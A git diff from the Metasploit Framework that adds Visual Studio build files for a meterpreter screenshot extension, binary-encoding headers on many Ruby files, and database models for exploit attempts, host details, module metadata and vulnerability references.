+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/screenshot/screenshot.vcxproj b/external/source/meterpreter/workspace/screenshot/screenshot.vcxproj
new file mode 100644
index 0000000000..95c032a381
--- /dev/null
+++ b/external/source/meterpreter/workspace/screenshot/screenshot.vcxproj
@@ -0,0 +1,234 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}
+ screenshot
+ Win32Proj
+
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+ DynamicLibrary
+ MultiByte
+ false
+
+
+ DynamicLibrary
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ true
+ $(SolutionDir)$(Configuration)\
+ $(Configuration)\
+ false
+ false
+ false
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ $(SolutionDir)$(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDebugDLL
+
+
+ Level3
+ EditAndContinue
+
+
+ true
+ Windows
+ MachineX86
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ false
+ Size
+ ..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ Level3
+ ProgramDatabase
+ Cdecl
+ CompileAsC
+ false
+
+
+ backcompat.lib;jpeg.lib;%(AdditionalDependencies)
+ .\release\screenshot.dll
+ ..\backcompat\Release;..\..\source\jpeg-8\lib\win\x86;%(AdditionalLibraryDirectories)
+
+
+ false
+ Windows
+ true
+ true
+ true
+ false
+ true
+ MachineX86
+ 5.0
+
+
+ copy /y "$(ProjectDir)\release\screenshot.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDebugDLL
+
+
+ Level3
+ ProgramDatabase
+
+
+ true
+ Windows
+ MachineX64
+
+
+
+
+ X64
+
+
+ MinSpace
+ OnlyExplicitInline
+ false
+ Size
+ ..\..\source\jpeg-8;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;SCREENSHOT_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+
+
+ Level3
+ ProgramDatabase
+ Cdecl
+ CompileAsC
+ false
+
+
+ jpeg.lib;%(AdditionalDependencies)
+ .\release\screenshot.x64.dll
+ ..\..\source\jpeg-8\lib\win\x64;%(AdditionalLibraryDirectories)
+
+
+ false
+ Windows
+ true
+ true
+ true
+ false
+ true
+ MachineX64
+
+
+ copy /y "$(ProjectDir)\release\screenshot.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/lib/bit-struct.rb b/lib/bit-struct.rb
index e06723fdc1..0ff621ce07 100644
--- a/lib/bit-struct.rb
+++ b/lib/bit-struct.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# A Convenience to load all field classes and yaml handling.
# XXX: Pretty certian this monkeypatch isn't required in Metasploit.
diff --git a/lib/bit-struct/bit-struct.rb b/lib/bit-struct/bit-struct.rb
index b5bf1a26bc..a96863a5d4 100644
--- a/lib/bit-struct/bit-struct.rb
+++ b/lib/bit-struct/bit-struct.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Class for packed binary data, with defined bitfields and accessors for them.
# See {intro.txt}[link:../doc/files/intro_txt.html] for an overview.
#
diff --git a/lib/bit-struct/char-field.rb b/lib/bit-struct/char-field.rb
index ca75f57e1a..0ceb5a35ed 100644
--- a/lib/bit-struct/char-field.rb
+++ b/lib/bit-struct/char-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for fixed length binary strings of characters.
# Declared with BitStruct.char.
diff --git a/lib/bit-struct/fields.rb b/lib/bit-struct/fields.rb
index 50d7a32ba7..4d581df1a5 100644
--- a/lib/bit-struct/fields.rb
+++ b/lib/bit-struct/fields.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
class << self
# Define a char string field in the current subclass of BitStruct,
diff --git a/lib/bit-struct/float-field.rb b/lib/bit-struct/float-field.rb
index 4365bcd6f3..d7e2e5b092 100644
--- a/lib/bit-struct/float-field.rb
+++ b/lib/bit-struct/float-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for floats (single and double precision) in network order.
# Declared with BitStruct.float.
diff --git a/lib/bit-struct/hex-octet-field.rb b/lib/bit-struct/hex-octet-field.rb
index 516bf05ea6..70c27c218e 100644
--- a/lib/bit-struct/hex-octet-field.rb
+++ b/lib/bit-struct/hex-octet-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'bit-struct/char-field'
class BitStruct
diff --git a/lib/bit-struct/nested-field.rb b/lib/bit-struct/nested-field.rb
index d9e6eb95ce..4182d1f7df 100644
--- a/lib/bit-struct/nested-field.rb
+++ b/lib/bit-struct/nested-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'bit-struct/bit-struct'
class BitStruct
diff --git a/lib/bit-struct/octet-field.rb b/lib/bit-struct/octet-field.rb
index 43ce4a3a29..5967967fc8 100644
--- a/lib/bit-struct/octet-field.rb
+++ b/lib/bit-struct/octet-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'bit-struct/char-field'
class BitStruct
diff --git a/lib/bit-struct/pad-field.rb b/lib/bit-struct/pad-field.rb
index 2561ec2cdf..f01476b23d 100644
--- a/lib/bit-struct/pad-field.rb
+++ b/lib/bit-struct/pad-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for fixed length padding.
class PadField < Field
diff --git a/lib/bit-struct/signed-field.rb b/lib/bit-struct/signed-field.rb
index c46e535ef7..0ab7cd9c19 100644
--- a/lib/bit-struct/signed-field.rb
+++ b/lib/bit-struct/signed-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for signed integers in network order, 1-16 bits, or 8n bits.
# Declared with BitStruct.signed.
diff --git a/lib/bit-struct/text-field.rb b/lib/bit-struct/text-field.rb
index bdb0dfe3fc..b4d8e0cf9e 100644
--- a/lib/bit-struct/text-field.rb
+++ b/lib/bit-struct/text-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for null-terminated printable text strings.
# Declared with BitStruct.text.
diff --git a/lib/bit-struct/unsigned-field.rb b/lib/bit-struct/unsigned-field.rb
index 966cd8020b..c254d99ebc 100644
--- a/lib/bit-struct/unsigned-field.rb
+++ b/lib/bit-struct/unsigned-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class BitStruct
# Class for unsigned integers in network order, 1-16 bits, or 8n bits.
# Declared with BitStruct.unsigned.
diff --git a/lib/bit-struct/vector-field.rb b/lib/bit-struct/vector-field.rb
index e05ca67816..b3b8330ebf 100644
--- a/lib/bit-struct/vector-field.rb
+++ b/lib/bit-struct/vector-field.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'bit-struct/vector'
class BitStruct
diff --git a/lib/bit-struct/vector.rb b/lib/bit-struct/vector.rb
index 0b8edcaade..a3acd63f2f 100644
--- a/lib/bit-struct/vector.rb
+++ b/lib/bit-struct/vector.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# A Vector is, like a BitStruct, a String. It retains all of the String
# methods, except for #[], #[]=, and #each. These methods operate on entries
# instead of chars. Other methods, including #length and #slice, are unchanged.
diff --git a/lib/bit-struct/yaml.rb b/lib/bit-struct/yaml.rb
index a44eb1783c..6f835b943e 100644
--- a/lib/bit-struct/yaml.rb
+++ b/lib/bit-struct/yaml.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'yaml'
class BitStruct
diff --git a/lib/fastlib.rb b/lib/fastlib.rb
index aebba24cbd..c709928683 100755
--- a/lib/fastlib.rb
+++ b/lib/fastlib.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# FASTLIB is a mechanism for loading large sets of libraries in a way that is
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/exploit_attempt.rb
new file mode 100755
index 0000000000..99c8a5be9d
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/exploit_attempt.rb
@@ -0,0 +1,8 @@
+module MetasploitDataModels::ActiveRecordModels::ExploitAttempt
+ def self.included(base)
+ base.class_eval {
+ belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :exploit_attempt_count
+ validates :host_id, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host.rb
index 6b40e380bc..6f0186ff41 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host.rb
@@ -17,6 +17,9 @@ module MetasploitDataModels::ActiveRecordModels::Host
has_many :creds, :through => :services, :class_name => "Mdm::Cred"
has_many :exploited_hosts, :dependent => :destroy, :class_name => "Mdm::ExploitedHost"
+ has_many :host_details, :dependent => :destroy, :class_name => "Mdm::HostDetail"
+ has_many :exploit_attempts, :dependent => :destroy, :class_name => "Mdm::ExploitAttempt"
+
validates :address, :presence => true, :ip_format => true
validates_exclusion_of :address, :in => ['127.0.0.1']
validates_uniqueness_of :address, :scope => :workspace_id, :unless => Proc.new { |host| host.ip_address_invalid? }
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host_detail.rb
new file mode 100755
index 0000000000..e8cc41eb5e
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host_detail.rb
@@ -0,0 +1,8 @@
+module MetasploitDataModels::ActiveRecordModels::HostDetail
+ def self.included(base)
+ base.class_eval {
+ belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :host_detail_count
+ validates :host_id, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_action.rb
new file mode 100644
index 0000000000..23e67da6f1
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_action.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleAction
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_actions"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_arch.rb
new file mode 100644
index 0000000000..656068d39f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_arch.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleArch
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_archs"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_author.rb
new file mode 100644
index 0000000000..b279c88043
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_author.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleAuthor
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_authors"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_detail.rb
new file mode 100755
index 0000000000..503e39869b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_detail.rb
@@ -0,0 +1,67 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleDetail
+ def self.included(base)
+ base.class_eval {
+ base.table_name = "module_details"
+
+ has_many :authors, :class_name => "Mdm::ModuleAuthor", :dependent => :destroy, :source => :module_author
+ has_many :mixins, :class_name => "Mdm::ModuleMixin", :dependent => :destroy, :source => :module_mixin
+ has_many :targets, :class_name => "Mdm::ModuleTarget", :dependent => :destroy, :source => :module_target
+ has_many :actions, :class_name => "Mdm::ModuleAction", :dependent => :destroy, :source => :module_action
+ has_many :refs, :class_name => "Mdm::ModuleRef", :dependent => :destroy, :source => :module_ref
+ has_many :archs, :class_name => "Mdm::ModuleArch", :dependent => :destroy, :source => :module_arch
+ has_many :platforms, :class_name => "Mdm::ModulePlatform", :dependent => :destroy, :source => :module_platform
+
+ validate :refname, :presence => true
+
+ validates_associated :authors
+ validates_associated :mixins
+ validates_associated :targets
+ validates_associated :actions
+ validates_associated :archs
+ validates_associated :platforms
+ validates_associated :refs
+
+ def add_author(name, email=nil)
+ if email
+ r = self.authors.build(:name => name, :email => email).save
+ else
+ self.authors.build(:name => name).save
+ end
+ end
+
+ def add_mixin(name)
+ self.mixins.build(:name => name).save
+ end
+
+ def add_target(idx, name)
+ self.targets.build(:index => idx, :name => name).save
+ end
+
+ def add_action(name)
+ self.actions.build(:name => name).save
+ end
+
+ def add_ref(name)
+ self.refs.build(:name => name).save
+ end
+
+ def add_arch(name)
+ self.archs.build(:name => name).save
+ end
+
+ def add_platform(name)
+ self.platforms.build(:name => name).save
+ end
+
+ def before_destroy
+ Mdm::ModuleAuthor.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModuleMixin.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModuleTarget.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModuleAction.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModuleRef.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModuleArch.delete_all('module_detail_id = ?', self.id)
+ Mdm::ModulePlatform.delete_all('module_detail_id = ?', self.id)
+ end
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_mixin.rb
new file mode 100644
index 0000000000..8f0258d4a1
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_mixin.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleMixin
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_mixins"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_platform.rb
new file mode 100644
index 0000000000..9d484e42f8
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_platform.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModulePlatform
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_platforms"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_ref.rb
new file mode 100644
index 0000000000..8bffa365a9
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_ref.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleRef
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_refs"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_target.rb
new file mode 100644
index 0000000000..7e52b1a296
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_target.rb
@@ -0,0 +1,9 @@
+module MetasploitDataModels::ActiveRecordModels::ModuleTarget
+ def self.included(base)
+ base.class_eval{
+ base.table_name = "module_targets"
+ belongs_to :module_detail
+ validate :name, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/ref.rb
index 259f60c958..e253bbbe1e 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/ref.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/ref.rb
@@ -1,7 +1,8 @@
module MetasploitDataModels::ActiveRecordModels::Ref
def self.included(base)
base.class_eval{
- has_and_belongs_to_many :vulns, :join_table => :vulns_refs, :class_name => "Mdm::Vuln"
+ has_many :vulns, :through => :vulns_refs, :class_name => "Mdm::Vuln"
+ has_many :vulns_refs, :class_name => "Mdm::VulnRef"
}
end
end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb
index d55493f163..d1e9c408c1 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb
@@ -3,7 +3,11 @@ module MetasploitDataModels::ActiveRecordModels::Vuln
base.class_eval {
belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :vuln_count
belongs_to :service, :class_name => "Mdm::Service", :foreign_key => :service_id
- has_and_belongs_to_many :refs, :join_table => :vulns_refs, :class_name => "Mdm::Ref"
+ has_many :vuln_details, :dependent => :destroy, :class_name => "Mdm::VulnDetail"
+ has_many :vuln_attempts, :dependent => :destroy, :class_name => "Mdm::VulnAttempt"
+ has_many :vulns_refs, :class_name => "Mdm::VulnRef"
+ has_many :refs, :through => :vulns_refs, :class_name => "Mdm::Ref"
+
validates :name, :presence => true
validates_associated :refs
@@ -22,6 +26,13 @@ module MetasploitDataModels::ActiveRecordModels::Vuln
def save_refs
refs.each { |ref| ref.save(:validate => false) }
end
+
+ def before_destroy
+ Mdm::VulnRef.delete_all('vuln_id = ?', self.id)
+ Mdm::VulnDetail.delete_all('vuln_id = ?', self.id)
+ Mdm::VulnAttempt.delete_all('vuln_id = ?', self.id)
+ end
+
}
end
end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_attempt.rb
new file mode 100755
index 0000000000..46a73890a8
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_attempt.rb
@@ -0,0 +1,8 @@
+module MetasploitDataModels::ActiveRecordModels::VulnAttempt
+ def self.included(base)
+ base.class_eval {
+ belongs_to :vuln, :class_name => "Mdm::Vuln", :counter_cache => :vuln_attempt_count
+ validates :vuln_id, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_detail.rb
new file mode 100755
index 0000000000..d3655e79cb
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_detail.rb
@@ -0,0 +1,8 @@
+module MetasploitDataModels::ActiveRecordModels::VulnDetail
+ def self.included(base)
+ base.class_eval {
+ belongs_to :vuln, :class_name => "Mdm::Vuln", :counter_cache => :vuln_detail_count
+ validates :vuln_id, :presence => true
+ }
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_ref.rb
new file mode 100644
index 0000000000..567ff44075
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_ref.rb
@@ -0,0 +1,10 @@
+module MetasploitDataModels::ActiveRecordModels::VulnRef
+ def self.included(base)
+ base.class_eval {
+ base.table_name = "vulns_refs"
+ belongs_to :ref
+ belongs_to :vuln
+ }
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec
index b69e324050..077ce55a67 100644
--- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec
+++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec
@@ -6,7 +6,7 @@ Gem::Specification.new do |s|
s.required_rubygems_version = Gem::Requirement.new("> 1.3.1") if s.respond_to? :required_rubygems_version=
s.authors = ["Trevor Rosen"]
- s.date = "2012-06-20"
+ s.date = "2012-06-25"
s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions."
s.email = ["trevor_rosen@rapid7.com"]
s.executables = ["mdm_console"]
diff --git a/lib/msf/base.rb b/lib/msf/base.rb
index 5257eeed38..5982de14cc 100644
--- a/lib/msf/base.rb
+++ b/lib/msf/base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# framework-base
diff --git a/lib/msf/base.rb.ts.rb b/lib/msf/base.rb.ts.rb
index d6d4c501c8..f3c7d92fa3 100644
--- a/lib/msf/base.rb.ts.rb
+++ b/lib/msf/base.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
require 'msf/base'
diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb
index 2aa2df6c70..2d8c98acba 100644
--- a/lib/msf/base/config.rb
+++ b/lib/msf/base/config.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'fileutils'
module Msf
diff --git a/lib/msf/base/logging.rb b/lib/msf/base/logging.rb
index 7bfd109f27..7806a11c9e 100644
--- a/lib/msf/base/logging.rb
+++ b/lib/msf/base/logging.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex'
require 'msf/base'
diff --git a/lib/msf/base/persistent_storage.rb b/lib/msf/base/persistent_storage.rb
index 58ad42572d..e5b90a79bd 100644
--- a/lib/msf/base/persistent_storage.rb
+++ b/lib/msf/base/persistent_storage.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/base/persistent_storage/flatfile.rb b/lib/msf/base/persistent_storage/flatfile.rb
index 663d5d50cc..1cc68b6992 100644
--- a/lib/msf/base/persistent_storage/flatfile.rb
+++ b/lib/msf/base/persistent_storage/flatfile.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
class PersistentStorage
diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb
index 50cc652a59..eca467119a 100644
--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Serializer
diff --git a/lib/msf/base/sessions/command_shell.rb b/lib/msf/base/sessions/command_shell.rb
index 61f97c7a0d..34f7465607 100644
--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
require 'msf/base/sessions/scriptable'
require 'shellwords'
diff --git a/lib/msf/base/sessions/command_shell.rb.ut.rb b/lib/msf/base/sessions/command_shell.rb.ut.rb
index 7c45d33afa..365465a6c7 100644
--- a/lib/msf/base/sessions/command_shell.rb.ut.rb
+++ b/lib/msf/base/sessions/command_shell.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
require 'msf/base'
diff --git a/lib/msf/base/sessions/command_shell_options.rb b/lib/msf/base/sessions/command_shell_options.rb
index c91db3d80f..028ce427ab 100644
--- a/lib/msf/base/sessions/command_shell_options.rb
+++ b/lib/msf/base/sessions/command_shell_options.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb
index dca3c2af92..211e52b4e1 100644
--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb
index 1f9bc5e0ea..7f298bf408 100644
--- a/lib/msf/base/sessions/meterpreter_java.rb
+++ b/lib/msf/base/sessions/meterpreter_java.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
